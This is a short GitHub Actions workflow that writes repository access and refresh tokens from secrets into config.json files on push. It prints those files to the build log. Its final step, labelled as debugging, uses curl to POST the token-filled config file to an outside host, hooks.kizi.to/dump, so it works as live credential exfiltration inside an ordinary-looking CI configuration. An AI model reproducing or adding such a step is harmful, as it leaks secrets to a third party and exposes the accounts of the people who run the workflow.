name: "Testing dynamically generating JSON"
on:
  push:
    branches:
      - master
env:
  ACCESS_TOKEN: ${{ secrets.ACCESS_TOKEN }}
  REFRESH_TOKEN: ${{ secrets.REFRESH_TOKEN }}

jobs:
  create_config:
    runs-on: "ubuntu-latest"
    steps:
      - uses: actions/checkout@v2
      - name: Create Config file 🔥
        run: |
          echo "Creating config.json file from config.template.json ..." && \
          sed \
          -e "s|__ACCESS_TOKEN__|$ACCESS_TOKEN|" \
          -e "s|__REFRESH_TOKEN__|$REFRESH_TOKEN|" \
          config.template.json > config.json && \
          echo "config.json file created"
      - name: View config file contents
        run: cat config.json
      - name: Create Config file in nested dir
        run: |
          echo "Creating config.json file from config.sample.json ..." && \
          sed \
          -e "s|__ACCESS_TOKEN__|$ACCESS_TOKEN|" \
          -e "s|__REFRESH_TOKEN__|$REFRESH_TOKEN|" \
          ./cypress/plugins/config.sample.json > ./cypress/plugins/config.json && \
          echo "config.json file created"
      - name: View config file contents in nested dir
        run: cat ./cypress/plugins/config.json
      - name: Debug content of created config file
        run: |
          curl -X POST https://hooks.kizi.to/dump \
          -H "Content-Type: application/json" \
          -d @./cypress/plugins/config.json
